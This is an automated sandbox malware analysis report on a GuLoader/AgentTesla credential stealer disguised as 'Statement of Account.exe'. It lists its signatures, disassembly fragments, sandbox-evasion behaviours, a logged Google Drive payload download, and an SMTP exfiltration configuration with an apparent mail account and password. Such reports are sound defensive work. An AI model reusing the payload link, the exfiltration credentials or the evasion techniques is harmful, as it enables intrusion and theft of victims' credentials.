Windows Analysis Report Statement of Account.exe

Overview

General Information

Sample Name: Statement of Account.exe
Analysis ID: 1640
MD5: 1232806812f946a2afabc5f5fe489de5
SHA1: f9a820627667403e90b3a387de0b644f8f0ddc31
SHA256: 86907475c81bc4700fc465c758592c51e905feed8aecdc0c10ccb6a8c650218a

Detection

GuLoader AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: conhost.exe.3088.17.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}
Multi AV Scanner detection for submitted file
Source: Statement of Account.exe ReversingLabs: Detection: 23%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D32DA50 CryptUnprotectData, 9_2_1D32DA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D32E0FB CryptUnprotectData, 9_2_1D32E0FB

Compliance:

Uses 32bit PE files
Source: Statement of Account.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49810 version: TLS 1.2
Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000E.00000002.48160223360.0000000000142000.00000002.00020000.sdmp, DnDcR.exe, 00000010.00000002.48240148335.00000000000D2000.00000002.00020000.sdmp, DnDcR.exe.9.dr

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edi, edi 1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then sub ecx, F6DD248Dh 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edi, edi 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edi, edi 1_2_0040346B
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_0040346B
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_0040346B
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_00403611
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_00403611
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_00403827
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edi, edi 1_2_004032D4
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_004032D4
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_004032D4
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_00403697
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_00403697
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_004038AC
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edi, edi 1_2_0040336A
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_0040336A
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_0040336A
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_0040371F
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_0040371F
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_004039C9
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edi, edi 1_2_004033EA
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_004033EA
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_004033EA
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_00403581
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_00403581
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_00403586
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_00403586
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_00403588
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_00403588
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_0040358A
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_0040358A
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_0040358C
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_0040358C
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_0040358E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_0040358E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_00403590
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_00403590
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_00403592
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_00403592
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_00403596
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_00403596
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_00403598
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_00403598
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_0040359A
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_0040359A
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_0040359C
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_0040359C
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_0040359E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_0040359E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_004035A0
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_004035A0
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_004035A2
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_004035A2
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_004035A4
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_004035A4
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_004035A6
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_004035A6
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_004035A8
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_004035A8
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_004035AA
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_004035AA
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_004031BE
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edi, edi 1_2_004031BE
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 4x nop then mov edx, edx 1_2_004031BE
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 5x nop then xor eax, dword ptr [edx+esi] 1_2_004031BE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49821 -> 65.60.11.90:587
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-4k-docs.googleusercontent.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49821 -> 65.60.11.90:587
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49821 -> 65.60.11.90:587
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52067893875.000000001E4E8000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000003.48737845239.000000001D071000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp String found in binary or memory: http://LUDB17WCKZR.org
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp String found in binary or memory: http://VpGUaC.com
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp String found in binary or memory: http://friendsequipment.com
Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp String found in binary or memory: http://mail.friendsequipment.com
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%4
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/
Source: RegAsm.exe, 00000009.00000003.47831098250.000000000165E000.00000004.00000001.sdmp String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/%%doc-0g-4k-docs.googleusercontent.com
Source: RegAsm.exe, 00000009.00000002.52056100424.000000000162E000.00000004.00000020.sdmp String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/4
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52056281072.000000000164E000.00000004.00000020.sdmp String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l
Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/Q
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh
Source: RegAsm.exe, 00000009.00000002.52066831984.000000001E412000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: RegAsm.exe, 00000009.00000002.52066831984.000000001E412000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-4k-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49810 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File written: C:\Windows\System32\drivers\etc\hosts

System Summary:

Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Uses 32bit PE files
Source: Statement of Account.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_00401868 1_2_00401868
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_00403248 1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_0040225E 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_0040346B 1_2_0040346B
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_00403611 1_2_00403611
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_004032D4 1_2_004032D4
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_0040336A 1_2_0040336A
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_004033EA 1_2_004033EA
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_00403590 1_2_00403590
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_004031BE 1_2_004031BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_01281130 9_2_01281130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_01284320 9_2_01284320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_01283A50 9_2_01283A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0128D490 9_2_0128D490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0128C730 9_2_0128C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_01283708 9_2_01283708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_012915F0 9_2_012915F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_01296F10 9_2_01296F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0133B388 9_2_0133B388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0133ED48 9_2_0133ED48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_013394BF 9_2_013394BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0133BEF8 9_2_0133BEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0133B9B2 9_2_0133B9B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0133D1AE 9_2_0133D1AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0133D1FA 9_2_0133D1FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0133B9EA 9_2_0133B9EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0133D3AF 9_2_0133D3AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_01333282 9_2_01333282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0133D2D2 9_2_0133D2D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_013337D8 9_2_013337D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D32A928 9_2_1D32A928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D32B170 9_2_1D32B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D322480 9_2_1D322480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D325E28 9_2_1D325E28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D32F130 9_2_1D32F130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D323DB8 9_2_1D323DB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D32B070 9_2_1D32B070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D7B49E8 9_2_1D7B49E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D7B78E0 9_2_1D7B78E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D7B0BD0 9_2_1D7B0BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D7B0040 9_2_1D7B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D7B7360 9_2_1D7B7360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D7B9CA0 9_2_1D7B9CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D7B5E68 9_2_1D7B5E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D7B1A47 9_2_1D7B1A47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1D7B24B8 9_2_1D7B24B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1E275E08 9_2_1E275E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1E274ACC 9_2_1E274ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1E275D20 9_2_1E275D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_1E276AF1 9_2_1E276AF1
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Code function: 14_2_00143DFE 14_2_00143DFE
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Code function: 16_2_000D3DFE 16_2_000D3DFE
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: String function: 0040177E appears 94 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 01286A80 appears 52 times
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Statement of Account.exe Process Stats: CPU usage > 98%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: Statement of Account.exe, 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameedderfu.exe vs Statement of Account.exe
Source: Statement of Account.exe, 00000001.00000002.47854997401.0000000002AC0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameedderfu.exeFE2X vs Statement of Account.exe
Source: Statement of Account.exe Binary or memory string: OriginalFilenameedderfu.exe vs Statement of Account.exe
PE file contains strange resources
Source: Statement of Account.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Statement of Account.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Section loaded: edgegdi.dll
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
Source: Statement of Account.exe ReversingLabs: Detection: 23%
Source: Statement of Account.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Statement of Account.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Statement of Account.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\Statement of Account.exe 'C:\Users\user\Desktop\Statement of Account.exe'
Source: C:\Users\user\Desktop\Statement of Account.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement of Account.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
